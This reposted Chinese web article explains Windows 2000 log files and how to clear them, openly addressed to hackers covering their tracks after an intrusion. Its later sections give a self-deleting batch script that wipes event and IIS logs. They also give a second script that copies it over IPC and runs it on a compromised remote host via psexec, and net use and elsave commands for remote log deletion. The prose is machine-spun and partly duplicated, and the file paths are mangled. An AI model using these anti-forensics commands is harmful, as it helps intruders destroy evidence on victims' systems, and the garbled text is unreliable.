您的位置 首页 方案

彻底清除本地和长途体系日志文件

什么是日志文件?它是一些文件系统集合,依靠建立起的各种数据的日志文件而存在。在任何系统发生崩溃或需要重新启动时,数据就遵从日志文件中的信息记录原封不动进行恢复。日志对于系统安全的作用是显而易见的,无论

什么是日志文件?它是一些文件体系调集,依托树立起的各种数据的日志文件而存在。在任何体系产生溃散或需求从头启动时,数据就遵照日志文件中的信息记载原封不动进行康复。日志关于体系安全的作用是清楚明了的,无论是网络管理员仍是 黑客都十分重视日志,一个有经历的管理员往往能够敏捷经过日志了解到体系的安全功能,而一个聪明的黑客会在侵略成功后敏捷铲除去对自己晦气的日志。无论是攻仍是防,日志的重要性由此可见。下面咱们就来简略讨论一下日志文件的铲除办法。

  一、日志文件的方位

  Windows 2000的体系日志文件有应用程序日志,安全日志、体系日志、DNS服务器日志等等,应用程序日志、安全日志、体系日志、DNS日志默许方位:%systemroot%system32config。

  安全日志文件:%systemroot%system32configSecEvent.EVT

  体系日志文件:%systemroot%system32configSysEvent.EVT

  应用程序日志文件:%systemroot%system32configAppEvent.EVT

  有的管理员很或许将这些日志重定位(所以日志或许不在上面那些方位),其间EVENTLOG下面有许多的子表,在里边可查到以上日志的定位目录。

  二、铲除自己电脑中的日志

  假如你要铲除自己电脑中的日志,能够用管理员的身份来登录Windows,然后在“控制面板”中进入“管理工具”,再双击里边的“事情查看器”。翻开后咱们就能够在这里铲除日志文件了,里边有应用程序、安全和体系日志文件。举个比如,比方说你想铲除安全日志,能够右键点击“安全日志”,在弹出的菜单中挑选“特点”。接下来在弹出的对话框中,点击下面“铲除日志”按钮就能够铲除了,假如你想今后再来铲除这些日志的话,能够将“按需求改写尺度”,这样就能够在到达最大日志尺度时进行改写事情了,不会提示你铲除日志。

  三、铲除长途主机上的日志

  大多数情况下,IIS的日志会忠实地记载它接收到的任何恳求(也有特别的不被IIS记载的进犯),一个优异的体系管理员会运用这点来发现侵略的妄图,维护自己的体系。所以假如你是黑客,侵略体系成功后榜首件事便是铲除日志,擦去自己的踪迹,这时能够用以下两个办法:一是自己编写批处理文件来处理,编写一个能铲除日志的批处理十分简略,办法是:新建一个具有如下内容的批处理文件:
@del c:winntsystem32logfiles*.*

  @del c:winntsystem32config*.evt

  @del c:winntsystem32dtclog*.*

  @del c:winntsystem32*.log

  @del c:winntsystem32*.txt

  @del c:winnt*.txt

  @del c:winnt*.log

  @del c:del.bat

  把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显指令,在它的前面加上“@”前缀字符,表明履行时本行在指令行或DOS里边不显现,别的del指令我们必定清楚吧?它是删去文件指令。

  接下来再新建一个批处理文件,内容如下:

  @copy del.bat %1c$

  @echo 向肉鸡仿制本机的del.bat……OK

  @psexec %1 c:del.bat

  @echo 在肉鸡上运转del.bat,铲除日志文件……OK

  保存为clean.bat即可,假定现已与肉鸡进行了IPC衔接,然后在CMD下输入:clean.bat 肉鸡IP,即可铲除肉鸡上的日志文件。

  铲除日志的别的一个办法是凭借第三方软件,如闻名黑客软件流光的开发者黑客小榕的elsave.exe,便是是一款能够长途铲除体系日志、应用程序日志、安全日志的软件,我们能够在网上下载到。elsave.exe运用起来很简略,首要运用取得的管理员账号与对方树立IPC会话:net use ip pass /user: user,然后在指令行下履行如下指令:elsave -s ip -l application -C,这样就删去了安全日志。

声明:本文内容来自网络转载或用户投稿,文章版权归原作者和原出处所有。文中观点,不代表本站立场。若有侵权请联系本站删除(kf@86ic.com)https://www.86ic.net/fangan/185809.html

为您推荐

联系我们

联系我们

在线咨询: QQ交谈

邮箱: kf@86ic.com

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

返回顶部